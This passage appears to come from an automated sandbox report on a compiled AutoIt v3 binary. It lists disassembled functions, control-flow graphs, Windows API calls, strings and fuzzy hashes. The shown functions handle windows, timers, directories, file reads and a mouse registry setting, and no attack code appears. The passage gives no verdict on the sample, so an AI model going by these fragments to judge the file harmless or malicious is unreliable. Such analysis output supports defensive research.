                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                • String ID: #$0$AutoIt v3
                • API String ID: 423443420-4155596026
                • Opcode ID: 282dc472a8d0a59a0d5fd1793c44585c27289dcca02d987a2f09fcb6b3919a8f
                • Instruction ID: a85c5de229732fa213a3ded03571d8a0d604b437020a9b96b22b2afb3616bf48
                • Opcode Fuzzy Hash: 282dc472a8d0a59a0d5fd1793c44585c27289dcca02d987a2f09fcb6b3919a8f
                • Instruction Fuzzy Hash: 1F212C71D10318ABDB109FA5EC55BAD7FFCFB48B50F00401AF609A62B0D7B945859F90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA3AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 812 ba3aa3-ba3ac6 813 ba3acc-ba3b35 call bc019b call ba7953 call babf07 call ba7953 * 2 call ba6e52 812->813 814 be4139-be414c call c0a12a 812->814 848 ba3b3b-ba3b48 call ba6cce call ba6b12 813->848 849 be456b-be457b call c0a12a 813->849 820 be4153-be415b 814->820 822 be415d-be4165 820->822 823 be416b-be4173 820->823 822->823 825 ba3b64-ba3bd3 call babf07 call ba3a70 call babf07 call ba557e call ba41c9 call ba6bfa 822->825 826 be417e-be4186 823->826 827 be4175-be417c 823->827 862 ba3bd9-ba3c48 call babf07 * 2 call ba694e call ba7af4 SetCurrentDirectoryW call babd2c * 2 call bc019b call ba41a6 825->862 863 be41b4-be41bf 825->863 831 be4188-be418f 826->831 832 be4191-be4199 826->832 830 be41a6-be41af call c0d4bf 827->830 830->825 831->830 832->825 834 be419f-be41a1 832->834 834->830 859 ba3b4d-ba3b5e call ba6afb 848->859 855 be4580 849->855 855->855 859->820 859->825 909 ba3c4c-ba3c51 862->909 863->862 865 be41c5-be41f8 call ba7953 call ba636d 863->865 875 be41fe-be4225 call c135cd call ba63db 865->875 876 be4502-be4519 call c0a12a 865->876 875->876 892 be422b-be42a7 call bc016b call babc23 call babb3d 875->892 885 ba3da5-ba3df0 call babd2c * 2 call ba7953 call babd2c call ba7953 call bc01a4 876->885 911 be446f-be44ab call babc23 call c113a0 call c04a0c call bc4d0e 892->911 912 be42ad-be42cf call babc23 892->912 913 ba3d71-ba3d92 call ba7953 SetCurrentDirectoryW 909->913 914 ba3c57-ba3c64 call baad74 909->914 963 be44ad-be44d2 call ba5c10 call bc01a4 call c11388 911->963 928 be42e5-be42f0 call c114a6 912->928 929 be42d1-be42e0 912->929 913->885 931 ba3d94-ba3da2 call bc015d call bc01a4 913->931 914->913 930 ba3c6a-ba3c86 call ba4093 call ba3ff3 914->930 946 be430d-be4318 call c11492 928->946 947 be42f2-be4308 928->947 934 be4401-be4414 call babb3d 929->934 954 be454e-be4566 call c0a12a 930->954 955 ba3c8c-ba3ca3 call ba3fb8 call bc4cf3 930->955 931->885 934->912 951 be441a-be4424 934->951 959 be432e-be4339 call bbe607 946->959 960 be431a-be4329 946->960 947->934 957 be4426-be4434 951->957 958 be4457 call c0a486 951->958 954->913 980 ba3cc6-ba3cc9 955->980 981 ba3ca5-ba3cc0 call bc6755 955->981 957->958 964 be4436-be4455 call ba40e0 957->964 966 be445c-be4469 958->966 959->934 976 be433f-be435b call c09f0d 959->976 960->934 963->885 964->966 966->911 966->912 990 be435d-be4388 call bab25f call babd2c 976->990 991 be438a-be438d 976->991 985 ba3ccf-ba3cd4 980->985 986 ba3df3-ba3df9 980->986 981->980 981->986 993 ba3cda-ba3d13 call bab25f call ba3e15 985->993 994 be452f-be4537 call c09dd5 985->994 986->985 989 ba3dff-be452a 986->989 989->985 1040 be43b6-be43c7 call babc23 990->1040 995 be438f-be43b5 call bab25f call ba7d27 call babd2c 991->995 996 be43c9-be43cc 991->996 1017 ba3d30-ba3d32 993->1017 1018 ba3d15-ba3d2c call bc01a4 call bc015d 993->1018 1012 be453c-be453f 994->1012 995->1040 1003 be43ce-be43d7 call c09e3c 996->1003 1004 be43ed-be43f1 call c1142e 996->1004 1024 be43dd-be43e8 call bc01a4 1003->1024 1025 be44d7-be4500 call c0a12a call bc01a4 call bc4d0e 1003->1025 1014 be43f6-be4400 call bc01a4 1004->1014 1019 ba3e08-ba3e10 1012->1019 1020 be4545-be4549 1012->1020 1014->934 1031 ba3d38-ba3d3b 1017->1031 1032 ba3e04 1017->1032 1018->1017 1028 ba3d5e-ba3d6b 1019->1028 1020->1019 1024->912 1025->963 1028->909 1028->913 1031->1019 1039 ba3d41-ba3d44 1031->1039 1032->1019 1039->1012 1044 ba3d4a-ba3d59 call ba40e0 1039->1044 1040->1014 1044->1028
                APIs
                  • Part of subcall function 00BA7953: FindCloseChangeNotification.KERNELBASE(?,?,00000000,00BE3A1C), ref: 00BA7973
                  • Part of subcall function 00BA6E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BA3B33,?,00008000), ref: 00BA6E80
                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00BA3C17
                • _wcslen.LIBCMT ref: 00BA3C96
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00BA3D81
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                • API String ID: 2701412040-3738523708
                • Opcode ID: 44ccdb89454ad6c31807334a609c6bfc2ad5d57519997ab37d010a233b31ca5f
                • Instruction ID: b2565f892e80a22af2326c7f2e797d44a3a23d20959303b7bd01416c40258767
                • Opcode Fuzzy Hash: 44ccdb89454ad6c31807334a609c6bfc2ad5d57519997ab37d010a233b31ca5f
                • Instruction Fuzzy Hash: A0227E7010C3809FC714EF24C881AAFBBE5EF96314F0409ADF595972A2DB70DA48DB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA3696 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1051 ba3696-ba36ab 1052 ba370b-ba370d 1051->1052 1053 ba36ad-ba36b0 1051->1053 1052->1053 1054 ba370f 1052->1054 1055 ba36b2-ba36b9 1053->1055 1056 ba3711 1053->1056 1057 ba36f6-ba36fe DefWindowProcW 1054->1057 1060 ba378b-ba3793 PostQuitMessage 1055->1060 1061 ba36bf-ba36c4 1055->1061 1058 be3dce-be3df6 call ba2f24 call bbf1c6 1056->1058 1059 ba3717-ba371c 1056->1059 1062 ba3704-ba370a 1057->1062 1094 be3dfb-be3e02 1058->1094 1064 ba371e-ba3721 1059->1064 1065 ba3743-ba376a SetTimer RegisterWindowMessageW 1059->1065 1063 ba373f-ba3741 1060->1063 1066 ba36ca-ba36ce 1061->1066 1067 be3e3b-be3e4f call c0c80c 1061->1067 1063->1062 1070 be3d6f-be3d72 1064->1070 1071 ba3727-ba373a KillTimer call ba388e call ba572c 1064->1071 1065->1063 1072 ba376c-ba3777 CreatePopupMenu 1065->1072 1073 ba36d4-ba36d9 1066->1073 1074 ba3795-ba379f call bbfcbb 1066->1074 1067->1063 1086 be3e55 1067->1086 1079 be3daa-be3dc9 MoveWindow 1070->1079 1080 be3d74-be3d78 1070->1080 1071->1063 1072->1063 1082 ba36df-ba36e4 1073->1082 1083 be3e20-be3e27 1073->1083 1088 ba37a4 1074->1088 1079->1063 1089 be3d7a-be3d7d 1080->1089 1090 be3d99-be3da5 SetFocus 1080->1090 1084 ba36ea-ba36f0 1082->1084 1085 ba3779-ba3789 call ba37a6 1082->1085 1083->1057 1092 be3e2d-be3e36 call c01367 1083->1092 1084->1057 1084->1094 1085->1063 1086->1057 1088->1063 1089->1084 1095 be3d83-be3d94 call ba2f24 1089->1095 1090->1063 1092->1057 1094->1057 1099 be3e08-be3e1b call ba388e call ba38f2 1094->1099 1095->1063 1099->1057
                APIs
                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BA3690,?,?), ref: 00BA36FE
                • KillTimer.USER32(?,00000001,?,?,?,?,?,00BA3690,?,?), ref: 00BA372A
                • SetTimer.USER32 ref: 00BA374D
                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BA3690,?,?), ref: 00BA3758
                • CreatePopupMenu.USER32(?,?,?,?,?,00BA3690,?,?), ref: 00BA376C
                • PostQuitMessage.USER32(00000000), ref: 00BA378D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                • String ID: TaskbarCreated
                • API String ID: 129472671-2362178303
                • Opcode ID: 32e1a800dbe1b318959c85557bd96627d2255d58d5fe341c2580b6a2c82a6662
                • Instruction ID: a55954b4072252cb9a1592466551fa212336ae475b8863b4e3a60f4a81fc92fb
                • Opcode Fuzzy Hash: 32e1a800dbe1b318959c85557bd96627d2255d58d5fe341c2580b6a2c82a6662
                • Instruction Fuzzy Hash: 89412AF121C144BBDB241B38DC8EF7D3AD9E747B10F0442A9F50A8A2A5CB759F809761
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA2A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1107 ba2a52-ba2a8b 1108 be39f4-be39f5 DestroyWindow 1107->1108 1109 ba2a91-ba2aa7 mciSendStringW 1107->1109 1112 be3a00-be3a0d 1108->1112 1110 ba2d08-ba2d15 1109->1110 1111 ba2aad-ba2ab5 1109->1111 1114 ba2d3a-ba2d41 1110->1114 1115 ba2d17-ba2d32 UnregisterHotKey 1110->1115 1111->1112 1113 ba2abb-ba2aca call ba2e70 1111->1113 1116 be3a0f-be3a12 1112->1116 1117 be3a3c-be3a43 1112->1117 1128 be3a4a-be3a56 1113->1128 1129 ba2ad0-ba2ad8 1113->1129 1114->1111 1120 ba2d47 1114->1120 1115->1114 1119 ba2d34-ba2d35 call ba2712 1115->1119 1121 be3a1e-be3a21 FindClose 1116->1121 1122 be3a14-be3a1c call ba7953 1116->1122 1117->1112 1125 be3a45 1117->1125 1119->1114 1120->1110 1127 be3a27-be3a34 1121->1127 1122->1127 1125->1128 1127->1117 1131 be3a36-be3a37 call c13c0b 1127->1131 1134 be3a58-be3a5a FreeLibrary 1128->1134 1135 be3a60-be3a67 1128->1135 1132 be3a6e-be3a7b 1129->1132 1133 ba2ade-ba2b03 call bae650 1129->1133 1131->1117 1137 be3a7d-be3a9a VirtualFree 1132->1137 1138 be3aa2-be3aa9 1132->1138 1145 ba2b3a-ba2b45 OleUninitialize 1133->1145 1146 ba2b05 1133->1146 1134->1135 1135->1128 1136 be3a69 1135->1136 1136->1132 1137->1138 1141 be3a9c-be3a9d call c13c71 1137->1141 1138->1132 1142 be3aab 1138->1142 1141->1138 1148 be3ab0-be3ab4 1142->1148 1147 ba2b4b-ba2b50 1145->1147 1145->1148 1149 ba2b08-ba2b38 call ba3047 call ba2ff0 1146->1149 1150 be3ac5-be3ad2 call c13c45 1147->1150 1151 ba2b56-ba2b60 1147->1151 1148->1147 1152 be3aba-be3ac0 1148->1152 1149->1145 1163 be3ad4 1150->1163 1154 ba2d49-ba2d56 call bbfb27 1151->1154 1155 ba2b66-ba2be7 call babd2c call ba2f86 call ba2e17 call bc01a4 call ba2dbe call babd2c call bae650 call ba2e40 call bc01a4 1151->1155 1152->1147 1154->1155 1168 ba2d5c 1154->1168 1169 be3ad9-be3afb call bc015d 1155->1169 1197 ba2bed-ba2c11 call bc01a4 1155->1197 1163->1169 1168->1154 1175 be3afd 1169->1175 1178 be3b02-be3b24 call bc015d 1175->1178 1185 be3b26 1178->1185 1188 be3b2b-be3b4d call bc015d 1185->1188 1194 be3b4f 1188->1194 1196 be3b54-be3b61 call c06d63 1194->1196 1202 be3b63 1196->1202 1197->1178 1203 ba2c17-ba2c3b call bc01a4 1197->1203 1205 be3b68-be3b75 call bbbd6a 1202->1205 1203->1188 1208 ba2c41-ba2c5b call bc01a4 1203->1208 1211 be3b77 1205->1211 1208->1196 1213 ba2c61-ba2c85 call ba2e17 call bc01a4 1208->1213 1215 be3b7c-be3b89 call c13b9f 1211->1215 1213->1205 1222 ba2c8b-ba2c93 1213->1222 1221 be3b8b 1215->1221 1223 be3b90-be3b9d call c13c26 1221->1223 1222->1215 1224 ba2c99-ba2cb7 call babd2c call ba2f4c 1222->1224 1229 be3b9f 1223->1229 1224->1223 1233 ba2cbd-ba2ccb 1224->1233 1232 be3ba4-be3bb1 call c13c26 1229->1232 1238 be3bb3 1232->1238 1233->1232 1235 ba2cd1-ba2d07 call babd2c * 3 call ba2eb8 1233->1235 1238->1238
                APIs
                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BA2A9B
                • OleUninitialize.OLE32(?,00000000), ref: 00BA2B3A
                • UnregisterHotKey.USER32(?), ref: 00BA2D1F
                • DestroyWindow.USER32(?), ref: 00BE39F5
                • FreeLibrary.KERNEL32(?), ref: 00BE3A5A
                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BE3A87
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                • String ID: close all
                • API String ID: 469580280-3243417748
                • Opcode ID: ba826a698c93f70ac6d415a19e3a91152f456cd6e849b8b05a1fdce86de01fab
                • Instruction ID: e5406bf3763cc397f9c418279a121c497a80c0ac0d5f48da9bb9cb7f9ac19d87
                • Opcode Fuzzy Hash: ba826a698c93f70ac6d415a19e3a91152f456cd6e849b8b05a1fdce86de01fab
                • Instruction Fuzzy Hash: 49D138317052529FCB29EF29C499B69F7E4EF06B00F1442EDE84A6B252CB31AD52CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C1874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1246 c1874a-c1878c call be22f0 call ba8e70 1251 c187a2 1246->1251 1252 c1878e-c1879c call bac92d 1246->1252 1254 c187a4-c187b0 1251->1254 1252->1251 1258 c1879e-c187a0 1252->1258 1256 c187b6 1254->1256 1257 c1886d-c1891f call ba8e70 call ba557e call bcd913 call bc93c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 1254->1257 1259 c187ba-c187c0 1256->1259 1291 c18921-c1892d call c0e387 1257->1291 1292 c18973-c18984 call bae650 1257->1292 1258->1254 1261 c187c2-c187c8 1259->1261 1262 c187ca-c187cf 1259->1262 1264 c187d6 1261->1264 1266 c187d1-c187d4 1262->1266 1267 c187d9-c187df 1262->1267 1264->1267 1266->1264 1269 c187e1-c187e4 1267->1269 1270 c18848-c1884a 1267->1270 1269->1270 1271 c187e6-c187e9 1269->1271 1272 c1884b-c1884e 1270->1272 1274 c18844-c18846 1271->1274 1275 c187eb-c187ee 1271->1275 1276 c18850-c18856 1272->1276 1277 c18858 1272->1277 1280 c1883d-c1883e 1274->1280 1275->1274 1279 c187f0-c187f3 1275->1279 1281 c1885c-c18867 1276->1281 1277->1281 1284 c18840-c18842 1279->1284 1285 c187f5-c187f8 1279->1285 1280->1272 1281->1257 1281->1259 1284->1280 1285->1284 1287 c187fa-c187fd 1285->1287 1289 c1883b 1287->1289 1290 c187ff-c18802 1287->1290 1289->1280 1290->1289 1293 c18804-c18807 1290->1293 1291->1292 1301 c1892f-c1893a call c0e9c5 1291->1301 1304 c18987-c1898b call babd2c 1292->1304 1295 c18834-c18839 1293->1295 1296 c18809-c1880c 1293->1296 1295->1272 1296->1295 1299 c1880e-c18811 1296->1299 1302 c18813-c18816 1299->1302 1303 c1882d-c18832 1299->1303 1312 c18940-c18967 GetFileAttributesW SetFileAttributesW 1301->1312 1313 c189cf 1301->1313 1302->1303 1306 c18818-c1881b 1302->1306 1303->1272 1308 c18990-c18998 1304->1308 1310 c18826-c1882b 1306->1310 1311 c1881d-c18820 1306->1311 1310->1272 1311->1310 1314 c1899b-c189af call bae650 1311->1314 1317 c189b1-c189b3 1312->1317 1318 c18969-c18971 SetCurrentDirectoryW 1312->1318 1316 c189d3-c189ec call c19f9f 1313->1316 1314->1308 1320 c18a02-c18a0c SetCurrentDirectoryW 1316->1320 1326 c189ee-c189fb call bae650 1316->1326 1317->1320 1321 c189b5-c189cd SetCurrentDirectoryW call bc4d13 1317->1321 1318->1292 1320->1304 1321->1316 1326->1320
                APIs
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C18907
                • SetCurrentDirectoryW.KERNELBASE(?), ref: 00C1891B
                • GetFileAttributesW.KERNEL32(?), ref: 00C18945
                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00C1895F
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18971
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C189BA
                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00C18A0A
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CurrentDirectory$AttributesFile
                • String ID: *.*
                • API String ID: 769691225-438819550
                • Opcode ID: ffb767998b968764be9b8a1fa70e22b72969b2df31b87cd9142694a52b120395
                • Instruction ID: 5e252f442b20a3b577c3cfec6e1d80eb1cfd9a30c2b6334ae9496de15d73364b
                • Opcode Fuzzy Hash: ffb767998b968764be9b8a1fa70e22b72969b2df31b87cd9142694a52b120395
                • Instruction Fuzzy Hash: CE81C3725083009BDB20EF15C484AEEB3E9BF86310F54481EF895D7291DB34DE89EB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD90D5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1411 bd90d5-bd90e5 1412 bd90ff-bd9101 1411->1412 1413 bd90e7-bd90fa call bcf656 call bcf669 1411->1413 1414 bd9469-bd9476 call bcf656 call bcf669 1412->1414 1415 bd9107-bd910d 1412->1415 1431 bd9481 1413->1431 1435 bd947c call bd2b7c 1414->1435 1415->1414 1417 bd9113-bd913e 1415->1417 1417->1414 1420 bd9144-bd914d 1417->1420 1423 bd914f-bd9162 call bcf656 call bcf669 1420->1423 1424 bd9167-bd9169 1420->1424 1423->1435 1428 bd916f-bd9173 1424->1428 1429 bd9465-bd9467 1424->1429 1428->1429 1434 bd9179-bd917d 1428->1434 1432 bd9484-bd9489 1429->1432 1431->1432 1434->1423 1438 bd917f-bd9196 1434->1438 1435->1431 1440 bd9198-bd919b 1438->1440 1441 bd91b3-bd91bc 1438->1441 1444 bd919d-bd91a3 1440->1444 1445 bd91a5-bd91ae 1440->1445 1442 bd91be-bd91d5 call bcf656 call bcf669 call bd2b7c 1441->1442 1443 bd91da-bd91e4 1441->1443 1474 bd939c 1442->1474 1447 bd91eb-bd9209 call bd3bb0 call bd2d58 * 2 1443->1447 1448 bd91e6-bd91e8 1443->1448 1444->1442 1444->1445 1449 bd924f-bd9269 1445->1449 1478 bd920b-bd9221 call bcf669 call bcf656 1447->1478 1479 bd9226-bd924c call bd97b4 1447->1479 1448->1447 1451 bd933d-bd9346 call bdfc3b 1449->1451 1452 bd926f-bd927f 1449->1452 1463 bd93b9 1451->1463 1464 bd9348-bd935a 1451->1464 1452->1451 1456 bd9285-bd9287 1452->1456 1456->1451 1460 bd928d-bd92b3 1456->1460 1460->1451 1465 bd92b9-bd92cc 1460->1465 1467 bd93bd-bd93d5 ReadFile 1463->1467 1464->1463 1469 bd935c-bd936b GetConsoleMode 1464->1469 1465->1451 1470 bd92ce-bd92d0 1465->1470 1472 bd93d7-bd93dd 1467->1472 1473 bd9431-bd943c GetLastError 1467->1473 1469->1463 1475 bd936d-bd9371 1469->1475 1470->1451 1476 bd92d2-bd92fd 1470->1476 1472->1473 1482 bd93df 1472->1482 1480 bd943e-bd9450 call bcf669 call bcf656 1473->1480 1481 bd9455-bd9458 1473->1481 1484 bd939f-bd93a9 call bd2d58 1474->1484 1475->1467 1483 bd9373-bd938d ReadConsoleW 1475->1483 1476->1451 1485 bd92ff-bd9312 1476->1485 1478->1474 1479->1449 1480->1474 1491 bd945e-bd9460 1481->1491 1492 bd9395-bd939b __dosmaperr 1481->1492 1489 bd93e2-bd93f4 1482->1489 1493 bd938f GetLastError 1483->1493 1494 bd93ae-bd93b7 1483->1494 1484->1432 1485->1451 1486 bd9314-bd9316 1485->1486 1486->1451 1496 bd9318-bd9338 1486->1496 1489->1484 1499 bd93f6-bd93fa 1489->1499 1491->1484 1492->1474 1493->1492 1494->1489 1496->1451 1504 bd93fc-bd940c call bd8df1 1499->1504 1505 bd9413-bd941e 1499->1505 1515 bd940f-bd9411 1504->1515 1509 bd942a-bd942f call bd8c31 1505->1509 1510 bd9420 call bd8f41 1505->1510 1516 bd9425-bd9428 1509->1516 1510->1516 1515->1484 1516->1515
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe988eaafc4bda0d8b5e18436a81830b8936b981d37327b915b28129a0b3e80a
                • Instruction ID: 2684b335276b9920e87f4dee02ab7267f426bb2465ade5f5d8fa24494988bee4
                • Opcode Fuzzy Hash: fe988eaafc4bda0d8b5e18436a81830b8936b981d37327b915b28129a0b3e80a
                • Instruction Fuzzy Hash: A8C1A270A04289AFDB11DFE8D845BADFBF5EF09310F1841DAE815A7392E7309942CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA353A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32 ref: 00BA3568
                • CreateWindowExW.USER32 ref: 00BA3589
                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA32EF,?), ref: 00BA359D
                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA32EF,?), ref: 00BA35A6
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$CreateShow
                • String ID: AutoIt v3$edit
                • API String ID: 1584632944-3779509399
                • Opcode ID: 6962ccedef09c5c814579f59d0251d8162b39ad9e6df38b8c2e798e77c8e1be8
                • Instruction ID: 9557e6b0e75ddcd28015c96fbf95871848af94974ea35939ad8dfde6e2b7cced
                • Opcode Fuzzy Hash: 6962ccedef09c5c814579f59d0251d8162b39ad9e6df38b8c2e798e77c8e1be8
                • Instruction Fuzzy Hash: AAF0DA716503947AEB3157277C08F3B2EBDD7C7F50F00001EB909A7170D6695891EAB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA55F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BA55EB,SwapMouseButtons,00000004,?), ref: 00BA561C
                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BA55EB,SwapMouseButtons,00000004,?), ref: 00BA563D
                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BA55EB,SwapMouseButtons,00000004,?), ref: 00BA565F
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
